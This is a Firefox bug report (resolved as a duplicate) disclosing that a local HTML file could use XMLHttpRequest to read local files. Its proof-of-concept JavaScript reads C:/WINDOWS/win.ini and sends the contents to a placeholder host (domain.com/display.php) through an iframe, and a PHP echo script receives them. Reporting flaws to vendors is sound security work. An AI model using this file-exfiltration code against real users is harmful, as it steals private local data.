343047 - Possible security flaw that would allow send data from the local machine

Status: RESOLVED DUPLICATE of bug 230606

(Firefox :: Security, defect)

Description

[Alex Concha]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

I've read http://zabbey.com/labs/firefox/ describing a possible security flaw that would allow send data (from local files) using XmlHttpRequest.

Reproducible: Always

Steps to Reproduce:
1. Open a local html file
[code]
<html>
<head>

<script type="text/javascript">
var req = new XMLHttpRequest();
function ajaxSend(file) {	
	req.open('get', file);
	req.onreadystatechange = ajaxResponse;
	req.send(null);
}

function ajaxResponse() {
  if(req.readyState == 4){
   var res = req.responseText; // content of file://C:/WINDOWS/win.ini
   document.getElementById('gotcha').src='http://domain.com/display.php?q='+encodeURIComponent(res);
  }
}
</script>
</head>
<body onload="ajaxSend('file://C:/WINDOWS/win.ini');">
<iframe id="gotcha"></iframe>
</body>
</html>
[/code]
-- Server side (display.php)
[code]
<?php
echo nl2br($_GET['q']);
?>
[/code]
Actual Results:  
File contents sent

Expected Results:  
I think firefox should not allow this behavior(!), but it seems like other browsers have this _problem_ too.

Comment 1

[Ryan Flint [:rflint] (ping via IRC for reviews)]

Please search prior to filing a bug.
See also bug 56236.

*** This bug has been marked as a duplicate of 258875 ***

Comment 2

[Ryan Flint [:rflint] (ping via IRC for reviews)]

Whoops, wrong bug number in the clipboard...

Comment 3

[Ryan Flint [:rflint] (ping via IRC for reviews)]

*** This bug has been marked as a duplicate of 230606 ***